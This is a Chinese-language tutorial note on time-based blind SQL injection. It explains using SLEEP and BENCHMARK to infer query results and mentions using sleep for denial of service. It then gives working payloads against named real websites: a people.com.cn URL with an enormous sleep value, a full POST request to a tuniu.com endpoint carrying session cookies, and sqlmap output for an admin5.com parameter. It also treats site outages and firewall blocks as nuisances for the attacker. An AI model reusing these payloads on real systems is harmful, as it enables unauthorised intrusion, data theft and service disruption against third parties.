sleep 延遲注入

A:     時間差注入也叫延遲注入，是一種盲注的手法   提交對執(zhí)行時間銘感的函數(shù)sql語句，通過執(zhí)行時間的長短來判斷是否執(zhí)行成功，比如:正確的話會導致時間很長，錯誤的話會導致執(zhí)行時間很短，這就是所謂的高級盲注。
     利用BENCHMARK sleep 函數(shù)來注入
     利用sleep也可以引起拒絕服務(wù)

B:

有時候當我們注入某站時，某站突然就打不開了，

被防火墻暫時隔離，你沒法瀏覽他的頁面，這時候你不得不換換IP,或者等待恢復，

或者提交注入?yún)?shù)的時候，網(wǎng)站的某種保護措施，他會跳轉(zhuǎn)某個錯誤頁面，訪問N次錯誤頁面的時候，才會正常訪問。

這樣就會影響咱們的效率,這就是為什么延時注入也算一節(jié)課的原因，還是蠻重要的.

C:

   途牛主站延時注入+waf繞過

   http://www.2cto.com/Article/201502/377118.html

eg.1

http://wap.people.com.cn/newsView.php?sid=&cnid=1456639 and sleep(99999999999)&chid=1_14_3&coid=1_14_3_1&wv=2&v=l&return=c

eg.2

POST /main.php?do=online_book_do_visitor HTTP/1.1
Host: km.tuniu.com
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://km.tuniu.com/main.php?do=online_book_visitor&order_id=4550094
Content-Length: 285
Cookie: p_phone_400=4007-999-999; PHPSESSID=8v1dgvcbbm0elnoprf91chnfv7; tuniu_channel=MTAwLDAsZDdiY2U0NTViYjViMDFhNWExYzk1YTM2ZjZiNDEyY2Q%3D; tuniuuser_citycode=MzMwMg%3D%3D; s_cc=true; s_nr=1421595835812; s_sq=%5B%5BB%5D%5D; __utma=1.151979505.1421595199.1421595199.1421595199.1; __utmb=1.170.9.1421599758357; __utmc=1; __utmz=1.1421595199.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _tacau=MCxmMWJlYWNiMS03N2M1LTQ0ZjEtOThlMC0wYzc5ZWE2ZTRjMmQs; _tact=Y2UyNzU5NmMtMDIxNS0yMjFjLTgzYjItMDgxODUyOTM0ODVm; _tacz2=taccsr%3D%28direct%29%7Ctacccn%3D%28none%29%7Ctaccmd%3D%28none%29%7Ctaccct%3D%28none%29%7Ctaccrt%3D%28none%29; _taca=1421595199130.1421595199130.1421595199130.1; _tacb=NGYzNDkyNWMtY2ZlNi05MmJjLTA4MDAtOTgxMmFlYjRlZTkx; _tacc=1; tuniuuser_ip_citycode=MjAw; tuniuuser=NzczODQ4Niw2ODIzNjEzODU5LDY4MjM2MTM4NTkmcXVvdDsmYW1wO2d0O3M7JiMwMzk7LDAsMTQyMTU5NTQzMiw5ZjY0OTg2YzdkYzE0NzM0ZDEwZGFiZjM2NWYyMDBlOQ%3D%3D; tuniusub=1; tuniuuser_p_w_picpath=aHR0cDovL20udHVuaXVjZG4uY29tL2ZpbGVicm9rZXIvY2RuL3ByZC83NS8wYy83NTBjMmRhYmFhZjRmYjY4ZjI2NzVlM2NlZjA1YmM2ZC5wbmc%3D; tuniuuser_vip=MA%3D%3D; tuniuuser_level=MA%3D%3D; tuniuuser_id=7738486; tuniuuser_name=NjgyMzYxMzg1OSZxdW90OyZhbXA7Z3Q7czsmIzAzOTs%3D; Hm_lvt_dbdbb8d9c6cd72876c254897549e524b=1421503111,1421591375,1421594808,1421595437; Hm_lpvt_dbdbb8d9c6cd72876c254897549e524b=1421597431; tuniu_app_cc=list_three_days; tuniu_zeus=MzNfMV8yXzFfMV83OjpodHRwOi8vd3d3LnR1bml1LmNvbS9zdGF0aWMveW91amkvOjoyMDE1LTAxLTE4IDIzOjM5OjE0%2CMV8xXzFfMl8xXzE6Omh0dHA6Ly90b3AudHVuaXUuY29tLzo6MjAxNS0wMS0xOCAyMzo0NTozMA%3D%3D%2CMTFfMl8xXzJfNV8xOjpodHRwOi8vd3d3LnR1bml1LmNvbS86OjIwMTUtMDEtMTggMjM6NDY6MDg%3D%2CMV8xXzFfMl8xXzE6Omh0dHA6Ly93d3cudHVuaXUuY29tLzo6MjAxNS0wMS0xOCAyMzo0ODozNQ%3D%3D%2CMTJfMl8xXzFfMl8zOjpodHRwOi8vd3d3LnR1bml1LmNvbS86OjIwMTUtMDEtMTkgMDA6NDk6MTg%3D; visit_history=5186662%2C780023%2C; _um_uuid=f7a45f3da941376f5abce7a65b613f27; __ozlvd1940=1421602934; tuniu_is_login=MQ%3D%3D; tuniu_newer=set_one_day; Hm_lvt_44f54d76a67ba9230a7bb92d5ed5e4ba=1421253828,1421597324; Hm_lpvt_44f54d76a67ba9230a7bb92d5ed5e4ba=1421597366; appdown=1; TUNIUmuser=1c80b2cffeddb233b6a4fbfddb375c15; tuniu_partner=MTAxLDAsLDlmZDgyZThjYTZkNGMwMTlmZTUyNzdlYjJmNTcxYzQ1; pgv_pvi=3638345589; pgv_info=ssi=s4790786375; tel_400=4007996820; PageSwitch=2%2C1429375904; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

visitor_info=123,33071919680425367s1l'+and+sleep%252811%2529+and+'1,1,1968-04-25,

eg.3

Place: GET

    Parameter: appid

    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: appid=330051' AND SLEEP(5) AND 'xRsl'='xRsl&host=admin5.com